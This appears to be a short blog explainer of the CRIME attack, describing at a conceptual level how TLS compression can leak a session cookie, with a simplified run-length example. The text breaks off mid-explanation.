What is the CRIME attack?
The CRIME Attack or Compression Ratio Info-leak Made Easy attack is an attack in which the attacker manages to decrypt the HTTPS cookie placed on the computer of a user and exploits that to impersonate the user in a web application and steals sensitive data after that. This attack is possible for HTTPS connections that use the data compression feature of SSL/TLS. The attack was first discovered by two security researchers, Juliano Rizzo and Thai Duong. Let’s understand the CRIME attack in more detail.
How does the CRIME attack work?
HTTPS protocol (How does HTTPS protocol work?) internally uses SSL/TLS (How does TLS protocol work?). When two hosts connect to each other using HTTPS protocol, a TLS connection is first established, and then the data is transferred in an encrypted format. So, it is challenging for an eavesdropper to listen to the conversation and get sensitive information.
On the other hand, when a user logs in to a web application, authentication information is stored in a cookie inside the user’s computer. So, after authentication, if the user’s browser makes an HTTPS request to the web application, the authentication information stored in the cookie is used.
If an attacker can access the authentication cookie, he can impersonate the victim to log in to his account in the web application. However, it is usually challenging for the attacker to access this authentication cookie. Moreover, in an HTTPS connection, the cookie is compressed using a lossless data compression algorithm. Then, it is encrypted and sent. So, the attacker cannot get the value of the cookie by mere eavesdropping.
In the CRIME attack, the attacker sends several HTTPS requests to the web application with a cookie value, which is appended with a few random characters over the actual cookie of the victim. Then, the attacker listens to the conversation to get the compressed and encrypted value of the cookie. After that, the attacker analyzes the results to get the actual value of the cookie.
To understand further, we need to know a little bit about the lossless compression algorithm that is used in HTTPS connections. Let’s suppose the value of the cookie is:
BBBBACDE
After compression, the value of the cookie would be :
4BACDE
At this point, if we prepend the data with one more A, the cookie and its compressed value would be :
ABBBBACDE
A4BACDE
But, if we prepend the value with a B, the cookie and its compressed value would be :
BBBBBACDE
5BACDE
So, if we prepend the data with a B, the compressed value will be less than the compressed value of …
0 Comments